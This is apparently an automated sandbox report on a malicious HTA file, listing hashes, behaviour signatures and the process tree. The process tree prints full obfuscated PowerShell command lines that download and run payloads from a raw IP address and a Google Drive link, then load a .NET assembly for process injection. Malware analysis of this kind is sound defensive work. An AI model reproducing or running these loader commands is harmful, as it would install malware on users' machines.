Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 06:02
Static task
static1
Behavioral task
behavioral1
Sample
sheisthebestcaseeveryoneknowbesththignstobegreatfor.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
sheisthebestcaseeveryoneknowbesththignstobegreatfor.hta
Resource
win10v2004-20241007-en
General
-
Target
sheisthebestcaseeveryoneknowbesththignstobegreatfor.hta
-
Size
130KB
-
MD5
1fd620bfc1434f416a86c5ab0ca98c41
-
SHA1
d2aab0e25bfa3e35f8ed5e8c4a772b7c5c083dcf
-
SHA256
c96daaf1a1dc9722c4a06193e1d651b4604384d0afd2eba041cb67bbbc4a24bd
-
SHA512
46aebd9323692bc22eaf4c5c615acccf73695a82812c0facec9f7017ef0304d48f76a84a1a8a021411e180ec357301c1a1e1c245a7178f73ef34ce13f89f2bc9
-
SSDEEP
96:Eam73ELEyboOrLEy7oOBnN0qfaJdoP8oLSLweoOpWLEy+c7T:Ea23iJaC8hiT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2536 pOwersHElL.exe 6 2700 powershell.exe 8 2700 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2700 powershell.exe 1068 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2536 pOwersHElL.exe 2348 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOwersHElL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2536 pOwersHElL.exe 2348 powershell.exe 2536 pOwersHElL.exe 2536 pOwersHElL.exe 1068 powershell.exe 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2536 pOwersHElL.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2376 wrote to memory of 2536 2376 mshta.exe 30 PID 2376 wrote to memory of 2536 2376 mshta.exe 30 PID 2376 wrote to memory of 2536 2376 mshta.exe 30 PID 2376 wrote to memory of 2536 2376 mshta.exe 30 PID 2536 wrote to memory of 2348 2536 pOwersHElL.exe 32 PID 2536 wrote to memory of 2348 2536 pOwersHElL.exe 32 PID 2536 wrote to memory of 2348 2536 pOwersHElL.exe 32 PID 2536 wrote to memory of 2348 2536 pOwersHElL.exe 32 PID 2536 wrote to memory of 2752 2536 pOwersHElL.exe 33 PID 2536 wrote to memory of 2752 2536 pOwersHElL.exe 33 PID 2536 wrote to memory of 2752 2536 pOwersHElL.exe 33 PID 2536 wrote to memory of 2752 2536 pOwersHElL.exe 33 PID 2752 wrote to memory of 2876 2752 csc.exe 34 PID 2752 wrote to memory of 2876 2752 csc.exe 34 PID 2752 wrote to memory of 2876 2752 csc.exe 34 PID 2752 wrote to memory of 2876 2752 csc.exe 34 PID 2536 wrote to memory of 2676 2536 pOwersHElL.exe 36 PID 2536 wrote to memory of 2676 2536 pOwersHElL.exe 36 PID 2536 wrote to memory of 2676 2536 pOwersHElL.exe 36 PID 2536 wrote to memory of 2676 2536 pOwersHElL.exe 36 PID 2676 wrote to memory of 1068 2676 WScript.exe 37 PID 2676 wrote to memory of 1068 2676 WScript.exe 37 PID 2676 wrote to memory of 1068 2676 WScript.exe 37 PID 2676 wrote to memory of 1068 2676 WScript.exe 37 PID 1068 wrote to memory of 2700 1068 powershell.exe 40 PID 1068 wrote to memory of 2700 1068 powershell.exe 40 PID 1068 wrote to memory of 2700 1068 powershell.exe 40 PID 1068 wrote to memory of 2700 1068 powershell.exe 40
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sheisthebestcaseeveryoneknowbesththignstobegreatfor.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\SysWOW64\WIndOwspOwerSheLl\v1.0\pOwersHElL.exe"C:\Windows\SyStem32\WIndOwspOwerSheLl\v1.0\pOwersHElL.exe" "poWERsHEll.eXE -eX BYPaSS -nop -W 1 -C devicEcREDeNtiaLdEpLoYmENT ; Iex($(iEx('[SYStem.TEXT.eNcODiNg]'+[CHar]58+[chAr]58+'UtF8.gEtstRINg([sYStEm.ConVErt]'+[char]58+[CHAr]58+'FrombAse64sTRinG('+[CHaR]34+'JFJ2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdQUkNUUUdZQmxFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbnpCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTmUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREN6QnZFTkl4eXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpemspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienRmalYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0a0RVUk0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRSdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC40MC84ODgvc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm1lLnRJRiIsIiRlTlY6QVBQREFUQVxzZWViZXN0dGhpbmdzd2l0aGdyZWF0bmV3c2dpdmVubS52YlMiLDAsMCk7U3RhclQtU2xFRVAoMyk7U1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm0udmJTIg=='+[chAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYPaSS -nop -W 1 -C devicEcREDeNtiaLdEpLoYmENT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bfuvcn4y.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE3A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAE39.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2876
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seebestthingswithgreatnewsgivenm.vbS"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdMZXhpbWFnZVVybCA9IHdMOGh0dHBzOi8vZHJpJysndmUuZ29vJysnZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHdMODtMZXh3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O0xleGltYWdlQnl0ZXMgPSAnKydMZXh3ZScrJ2JDbGllbnQuRG93JysnbmxvYWREYXRhKExleGltYWdlVXJsKTtMZXhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jJysnb2RpbmddOjpVVEY4LkdldFN0cmluZyhMZXhpbWFnZUJ5dGVzKTtMZXhzdGFydEYnKydsYWcgPSB3TDg8PEJBU0U2NF9TVEFSVD4+d0w4O0xleGVuZCcrJ0ZsYWcgPSB3TDg8PEJBU0U2NF9FTkQ+PndMODtMZXhzdGFydEluZGUnKyd4ID0gTGV4aW1hZ2VUZXh0LkluZGV4T2YoTGV4c3RhcnRGbGFnKTtMZXhlJysnbmRJbmRleCA9IExleGltYWdlVGV4JysndC5JbmRleE9mKExleGVuZEZsYWcpO0xleHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBMZXhlJysnbmRJbmRleCAtZ3QgTGV4c3RhcnRJbmRleDtMZXhzdGFydEluZGV4ICs9ICcrJ0xleHN0YXJ0RmxhZy5MZW5ndGg7TGV4YmFzZTY0TGVuZ3RoID0gTGV4ZW5kSW5kZXggLSBMZXhzdGFydEluZGV4O0xleGJhc2U2NEMnKydvbW1hJysnbmQgPSBMZXhpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ0xleHN0YXJ0SW5kZXgsIExleGJhc2U2NExlbmd0aCk7TGV4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoTGV4YmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcnJheSgpIDZNdCBGb3JFYWNoLU9iamVjdCB7IExleF8gfSlbLTEuLi0oTGV4YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtMZXhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKExleGJhcycrJ2U2NFJldmVyc2VkKTtMZXhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoTGV4Y29tbWFuZEJ5dGVzKTtMZXh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TScrJ2V0aG9kKHdMOFZBSXdMOCk7TGV4dmFpTWV0aG9kLkludm9rZShMZXhudWxsLCBAKHdMOHR4dC5SRUVXUS84ODgvMDQuMDIyLjMuMjkxLy86cHR0aHdMOCwgd0w4ZGVzYXRpdmFkb3dMOCwgd0w4JysnZGVzYXRpdmFkb3dMOCwgd0w4ZGVzYXRpdmFkb3dMOCwgdycrJ0w4QWRkSW5Qcm9jZXNzMzJ3TDgsIHdMOGRlc2F0aXZhZG93TDgsIHdMOGRlc2F0aXZhZG93TDgsd0w4ZGVzYXRpdmFkb3dMOCx3TDhkZXNhdGl2YWRvd0w4LHdMOGRlJysnc2F0aXZhZG93TDgsd0w4ZGVzYXRpdmFkb3dMOCx3TDhkZXNhdGl2JysnYWRvd0w4LHdMODF3TDgnKycsd0w4ZGVzJysnYXRpdmFkb3dMOCkpOycpLnJFcGxhY2UoJ0xleCcsW1NUcmluZ11bQ0hBUl0zNikuckVwbGFjZSgoW0NIQVJdMTE5K1tDSEFSXTc2K1tDSEFSXTU2KSxbU1RyaW5nXVtDSEFSXTM5KS5yRXBsYWNlKChbQ0hBUl01NCtbQ0hBUl03NytbQ0hBUl0xMTYpLCd8JykgfCBpRXg=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('LeximageUrl = wL8https://dri'+'ve.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur wL8;LexwebClient = New-Object System.Net.WebClient;LeximageBytes = '+'Lexwe'+'bClient.Dow'+'nloadData(LeximageUrl);LeximageText = [System.Text.Enc'+'oding]::UTF8.GetString(LeximageBytes);LexstartF'+'lag = wL8<<BASE64_START>>wL8;Lexend'+'Flag = wL8<<BASE64_END>>wL8;LexstartInde'+'x = LeximageText.IndexOf(LexstartFlag);Lexe'+'ndIndex = LeximageTex'+'t.IndexOf(LexendFlag);LexstartIndex -ge 0 -and Lexe'+'ndIndex -gt LexstartIndex;LexstartIndex += '+'LexstartFlag.Length;Lexbase64Length = LexendIndex - LexstartIndex;Lexbase64C'+'omma'+'nd = LeximageText.Substring('+'LexstartIndex, Lexbase64Length);Lexbase64Reversed = -join (Lexbase64Command.ToCha'+'rArray() 6Mt ForEach-Object { Lex_ })[-1..-(Lexbase64Command.Length)];LexcommandBytes = [System.Convert]::FromBase64String(Lexbas'+'e64Reversed);LexloadedAssembly = [System.Reflection.Assembly]::Load(LexcommandBytes);LexvaiMethod = [dnlib.IO.Home].GetM'+'ethod(wL8VAIwL8);LexvaiMethod.Invoke(Lexnull, @(wL8txt.REEWQ/888/04.022.3.291//:ptthwL8, wL8desativadowL8, wL8'+'desativadowL8, wL8desativadowL8, w'+'L8AddInProcess32wL8, wL8desativadowL8, wL8desativadowL8,wL8desativadowL8,wL8desativadowL8,wL8de'+'sativadowL8,wL8desativadowL8,wL8desativ'+'adowL8,wL81wL8'+',wL8des'+'ativadowL8));').rEplace('Lex',[STring][CHAR]36).rEplace(([CHAR]119+[CHAR]76+[CHAR]56),[STring][CHAR]39).rEplace(([CHAR]54+[CHAR]77+[CHAR]116),'|') | iEx"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cabdc0e5a8c07b76e5a16fde457f6fd8
SHA1cf4cdf7ccf978610d1e617ac3f2e784f867241e0
SHA2565a9e51f9de7883a73178d241811028ddc2287cbcadd2c25c9d5ff2ac1e0022cd
SHA51292e202fb369461a75f3ff8367787066a7d0b2c7f6ba39c6811739faa6ca887d39ba2830c66598bceeaf3bd83d3f6b7eb439a9ba4b8b6662d3613e2a667d31a30
-
Filesize
3KB
MD5f0f43f7ea9c2156ad3ef3b234a29b952
SHA10105c38df772842b39d33adebcfcb43b98f4fef7
SHA25618eaf4d3bcfce137224306d780ae1daba5dfa45cb6cab9939d82ec4e09563bce
SHA512285707e7b977bb8c3fea81af5182fb268c98446e36be7a8214c2085b3ab7b03cecc72c382a0e01d8cb6a516a5a671600b23b555c26e8d7427e98cc922662d7c3
-
Filesize
7KB
MD565d79726f05403afb98efc8d2e3dc444
SHA1e81d95fbb228c5ec8e760140e1b78de0af9af4c0
SHA25692542caaca1e35a2cf0be80227293b3fd7bf0ad3090a7d6e690da0f3bce190bc
SHA512b79ebf10756bb2e7fc9eaf62ae4c81dd6a277af63fc4fd634b3351f0590268f122e59c2f30290461d41fc4f1a54b67f431877f721fdc9a3996dc0a014a6dea70
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD596c33c029c818ca1e465415e11e6442b
SHA1bd8b4895639f17541bba07d7e433241fee2b57bd
SHA2566418c7a6b9c249d6a60f0ba8b77a9b091a2c2d3f7c96e3ae5b5ad250ecf9f8c4
SHA512a03d8b6e7404e71150c9e2150aa49411cc217332ceaa68121ee1a9b25ff3615e56eef268efe2506e36ca4e21852923d1df6d9ac94bce0a5f2ba12c6e52f0ef2b
-
Filesize
191KB
MD53b2dfe853b29b8f7c863a177c77b2e0a
SHA1f15bcc4bab2d0f9d84c6e09947982d86c9719524
SHA256605997c72f3ef670c71c934cbb9b9b989fb83be8e7e9303df63695ecbaca4d1e
SHA512d32da36c3c5ba33b840f8a99e5c8a13df9761e6b84c7b11c1d91e2eabeb478d564ea9801f36a5099741a90bf19ac0f83e445a46d94192693eeb5cc55635557ff
-
Filesize
652B
MD53f278c31687704ed4e532d5a3211b9ef
SHA1ebb7f7af1ef62618b8e51f5d6c655cb70f6d79fa
SHA2561bf39cf29a2b3d0ce3c6d4819f4341f9a5968af21629639e06c11e44fd7e29f7
SHA51212a6180eac3a4252daf9b693f7b6e402b2e9e9cd1de5bac02f8096c77e0b9ca07919f0c02173480faa110152afababdc535347ddd3beccff0eaf898bd45d7797
-
Filesize
472B
MD5ebe44eb3851718dda661ef08a5ae1f72
SHA1fc84762887e0b10691ab43cb52f59169096936ec
SHA2563c667a3bd30fef3aa5caf37fb56f20687efa429605d0412bad70f15890e9e6d4
SHA51299a0db30aac98a290b73db9bfd3a5aa7f1aba22e5e2dcf2e73b5749f8ddcc01d4520d47b428f647ef622bfd893962c5efc55237b3cd5b2a95c186ecb41d7256e
-
Filesize
309B
MD540a500201d97abbc829b29b87e5f668c
SHA157cb9438871a2262a90967fb10d92108d7ff9ec9
SHA25690e26f8d2082770f026386a59d9ae63a2bd59b6781cdb850f0d4b28fd42879b1
SHA512511e4f38c284f69afe7e653845c3f391f289200b4eda6056f2d3ffae260e792a525fb6315448cb805208454982f7a622e3092f873d7818e0f6e9e93a312da446